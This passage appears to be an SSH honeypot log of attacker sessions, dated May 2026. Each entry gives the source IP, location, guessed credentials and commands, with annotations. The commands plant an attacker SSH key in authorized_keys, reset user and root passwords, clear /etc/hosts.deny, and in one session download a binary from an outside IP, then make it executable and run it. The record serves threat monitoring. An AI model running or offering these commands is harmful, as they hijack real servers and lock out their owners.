$ echo "654321\n4yOFz7YPhc48\n4yOFz7YPhc48\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:fKcIWYSfs8kq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 pretzel_root_22 (159.89.15.209) β€” Frankfurt am Main, Germany Β· 1 session Β· 20 cmds
2026-05-08 23:15 EDT Β· as ubuntu/qazwsx12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qazwsx12\nwhbdxfjNMrLM\nwhbdxfjNMrLM"|passwd|bash
$ Enter new UNIX password:
$ echo "qazwsx12\nwhbdxfjNMrLM\nwhbdxfjNMrLM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_6 (101.126.54.167) β€” Chaowai, China Β· 1 session Β· 2 cmds
2026-05-08 23:15 EDT Β· as user/1qaz
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 shadow_root_102 (103.243.24.124) β€” San Po Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-08 22:55 EDT Β· as hadoop/qwerty
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qwerty\nxbml1wmgSTo7\nxbml1wmgSTo7"|passwd|bash
$ Enter new UNIX password:
$ echo "qwerty\nxbml1wmgSTo7\nxbml1wmgSTo7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_103 (163.7.3.26) β€” Banguntapan, Indonesia Β· 1 session Β· 20 cmds
2026-05-08 22:55 EDT Β· as hadoop/qwerty
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qwerty\nZR3jOVK4a9os\nZR3jOVK4a9os"|passwd|bash
$ Enter new UNIX password:
$ echo "qwerty\nZR3jOVK4a9os\nZR3jOVK4a9os\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_110 (81.193.159.166) β€” Santa Cruz das Flores, Portugal Β· 1 session Β· 20 cmds
2026-05-08 22:53 EDT Β· as es/es123!@#
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "es123!@#\nde2w8JZJHHdO\nde2w8JZJHHdO"|passwd|bash
$ Enter new UNIX password:
$ echo "es123!@#\nde2w8JZJHHdO\nde2w8JZJHHdO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_107 (110.38.237.42) β€” Lahore, Pakistan Β· 1 session Β· 9 cmds
2026-05-08 22:40 EDT Β· as user2/Qwerty1
file attribute tampering β†’ SSH key persistence
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
$ rm ./upnpsetup
$ wget -nc http://45.87.174.8/k.php?a=x86_64,46MF77XE7D2X6MMJH -O ./upnpsetup
$ chmod 777 ./upnpsetup // make executable (world)
$ sudo ./upnpsetup
$ ./upnpsetup // execute payload
🎭 jade_root_29 (117.157.80.46) β€” Lanzhou, China Β· 1 session Β· 1 cmd
2026-05-08 22:27 EDT Β· as ubuntu/mail!!!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 borscht_root_6 (154.83.196.237) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-05-08 22:24 EDT Β· as root/abc2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:miL6svTgOjVV"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_36 (223.78.68.246) β€” Qingdao, China Β· 1 session Β· 1 cmd
2026-05-08 17:03 EDT Β· as mail/@mail@2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 panda_root_43 (115.190.150.159) β€” Haidian, China Β· 1 session Β· 2 cmds
2026-05-08 14:54 EDT Β· as root/12345678
echo β†’ echo
$ echo 1 > /dev/null && cat /bin/echo
$ echo 12345678 > /tmp/.opass
🎭 dragon_root_37 (115.190.235.23) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-08 12:36 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 shadow_root_104 (78.134.49.171) β€” Fondi, Italy Β· 2 sessions Β· 40 cmds
2026-05-08 11:42 EDT Β· as ubuntu/Ubuntu@123, user/Qwerty@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Ubuntu@123\nzJ5iTGxudeVO\nzJ5iTGxudeVO"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Ubuntu@123\nzJ5iTGxudeVO\nzJ5iTGxudeVO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Qwerty@123\no3eaChGeDWxt\no3eaChGeDWxt"|passwd|bash
$ echo "Qwerty@123\no3eaChGeDWxt\no3eaChGeDWxt\n"|passwd
🎭 jade_root_30 (125.107.236.236) β€” Shaoxing, China Β· 1 session Β· 1 cmd
2026-05-08 11:47 EDT Β· as ubuntu/Mail123456@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 liberty_root_48 (40.83.182.122) β€” San Francisco, United States Β· 1 session Β· 20 cmds
2026-05-08 11:06 EDT Β· as linux/ubuntu
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ubuntu\njnh2alO94tGJ\njnh2alO94tGJ"|passwd|bash
$ Enter new UNIX password:
$ echo "ubuntu\njnh2alO94tGJ\njnh2alO94tGJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_108 (187.174.238.116) β€” Álvaro ObregΓ³n, Mexico Β· 1 session Β· 20 cmds
2026-05-08 10:23 EDT Β· as webuser/pass
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "pass\nSY8irO0PdcGv\nSY8irO0PdcGv"|passwd|bash
$ Enter new UNIX password:
$ echo "pass\nSY8irO0PdcGv\nSY8irO0PdcGv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_105 (223.123.65.63) β€” Islamabad, Pakistan Β· 1 session Β· 18 cmds
2026-05-08 10:06 EDT Β· as webuser/pass
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "pass\n2Ls8iilyEwBs\n2Ls8iilyEwBs"|passwd|bash
$ Enter new UNIX password:
$ echo "pass\n2Ls8iilyEwBs\n2Ls8iilyEwBs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_120 (193.106.245.20) β€” Krakow, Poland Β· 1 session Β· 20 cmds
2026-05-08 09:27 EDT Β· as Ubuntu/Ubuntu123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Ubuntu123\nSM1q4Msp8QXO\nSM1q4Msp8QXO"|passwd|bash
$ Enter new UNIX password:
$ echo "Ubuntu123\nSM1q4Msp8QXO\nSM1q4Msp8QXO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 acai_root (187.62.87.27) β€” MairiporΓ£, Brazil Β· 1 session Β· 19 cmds
2026-05-08 09:26 EDT Β· as root/admin%123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:rOEO3GTTT3eK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_59 (73.36.177.174) β€” Valparaiso, United States Β· 1 session Β· 20 cmds
2026-05-08 08:38 EDT Β· as postgres/!QAZ@WSX3edc4rfv
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "!QAZ@WSX3edc4rfv\nHuPwpVLniuuo\nHuPwpVLniuuo"|passwd|bash
$ Enter new UNIX password:
$ echo "!QAZ@WSX3edc4rfv\nHuPwpVLniuuo\nHuPwpVLniuuo\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_104 (155.103.71.32) β€” Istanbul, TΓΌrkiye Β· 1 session Β· 20 cmds
2026-05-08 08:16 EDT Β· as Ubuntu/Ubuntu123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Ubuntu123\nMT4dyTmKPO3G\nMT4dyTmKPO3G"|passwd|bash
$ Enter new UNIX password:
$ echo "Ubuntu123\nMT4dyTmKPO3G\nMT4dyTmKPO3G\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
